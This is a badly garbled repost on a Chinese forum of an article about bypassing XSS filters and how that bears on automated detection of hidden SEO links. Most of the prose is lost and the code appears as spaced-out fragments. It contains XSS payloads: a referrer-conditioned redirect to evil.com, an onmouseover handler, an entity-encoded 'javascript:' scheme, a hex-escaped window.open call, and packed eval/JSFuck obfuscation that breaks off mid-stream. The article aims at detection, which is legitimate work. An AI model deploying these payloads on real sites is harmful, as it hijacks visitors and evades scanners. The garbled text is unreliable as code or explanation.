搜索

[16351] 2021-01-22_前端那些事儿:绕过XSS过滤对自动化暗链检测带来的启发

文档创建者:s7ckTeam
浏览次数:32
最后更新:2025-01-18
2021-01-22_前端那些事儿:绕过XSS过滤对自动化暗链检测带来的启发 X S S   F r e e B u f   2 0 2 1 - 0 1 - 2 2 b y p a s s X S S i d e a 访 J S d o c u m e n t . r e f e r e : H T T P   H e a d e r   r e f e r e r 访 西 j s R e q u e s t . H e a d e r s [ R e f e r e r ]   j s j s   d o c u m e n t . r e f e r e r   g o o g l e   a d s C N Z Z j s u r l t i t l e t i t l e 西 f o f a 0 x 0 0   h t m l x s s 1 0 u n i c o d e t i t l e x s s   H T M L x s s < s c r i p t > h t m l j a v a s c r i p t X S S j a v a s c r i p t : a l e r t ( H e l l o w o r l d ! ) 1 0 u n i c o d e t i t l e 1 0 U n i c o d e 0 x 0 1   1 6 J S X S S X S S 使 1 6 使 1 6 w i n d o w b a i d u j s o p e n 使 1 6 使 J a v a S c r i p t e v a l j s e v a l ( f u n c t i o n ( p , a , c , k , e , d ) 线 | e v a l < s c r i p t >   i f ( d o c u m e n t . r e f e r r e r . I n d e x O f ( " b a i d u . c o m " ) > 0 ) {   l o c a t i o n . h r e f = " h t t p : / / e v i l . c o m " ;   }   < / s c r i p t > < i m g   o n m o u s e o v e r = ' j a v a s c r i p t : a l e r t ( " H e l l o   w o r l d ! " ) '   s r c = " x x x x " > & # 1 0 6 ; & # 9 7 ; & # 1 1 8 ; & # 9 7 ; & # 1 1 5 ; & # 9 9 ; & # 1 1 4 ; & # 1 0 5 ; & # 1 1 2 ; & # 1 1 6 ; : a l e r t ( " H e l l o   w o r l d ! " ) < t i t l e > / t i t l e >   < t i t l e > & # x 8 F D 9 ; & # x 6 6 2 F ; & # x 4 E 0 0 ; & # x 8 8 4 C ; & # x 6 F 1 4 ; & # x 7 9 3 A ; & # x 4 E E 3 ; & # x 7 8 0 1 ; < / t i t l e > t i t l e < s c r i p t   t y p e   =   " t e x t / j a v a s c r i p t " > w i n d o w [ " o p e n " ] ( " x 6 8 x 7 4 x 7 4 x 7 0 x 3 a x 2 f x 2 f x 7 7 x 7 7 x 7 7 x 2 e x 6 2 x 6 1 x 6 9 x 6 4 x 7 5 x 2 e x 6 3 x 6 f x 6 d " ) < / s c r i p t >
1 6 J S J S e v a l ( ) 线 线 J S b a y p a s s 0 x 0 2   J S f u c k 使 X S S J S f u c k J S F u c k     6     ! +     J a v a S c r i p t     J S F u c k     a l e r t ( 1 ) J S f u c k h t t p : / / w w w . j s f u c k . c o m / 1 6 J S + e v a l 使 J S F c u k X S S 仿 X S S 1 . 1 0 u n i c o d e 2 . e v a l j s 3 . J S F u c k X S S e v a l ( f u n c t i o n ( p , a , c , k , e , d ) { e = f u n c t i o n ( c ) { r e t u r n ( c < a ? ' ' : e ( p a r s e I n t ( c / a ) ) ) + ( ( c = c % a ) > 3 5 ? S t r i n g . f r o m C h a r C o d e ( c + 2 9 ) : c . t o S t r i n g ( 3 6 ) ) } ; i f ( ! ' ' . r e p l a c e ( / ^ / , S t r i n g ) ) { w h i l e ( c - - ) d [ e ( c ) ] = k [ [ ] [ ( ! [ ] + [ ] ) [ + [ [ + [ ] ] ] ] + ( [ ] [ [ ] ] + [ ] ) [ + [ [ ! + [ ] + ! + [ ] + ! + [ ] + ! + [ ] + ! + [ ] ] ] ] + ( ! [ ] + [ ] ) [ + [ [ ! + [ ] + ! + [ ] ] ] ] + ( ! ! [ ] + [ ] ) [ + [ [ + [ ] ] ] ] + ( ! ! [ ] + [ ] ) [ + [ [ ! + [ ] + ! + [ ] + ! + [ ] ] ] ] + ( ! ! [ ] + [ ] ) [ + [ [ + ! + [ ] ] ] ] ] [ ( [ ] [ ( ! [ ] + [

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理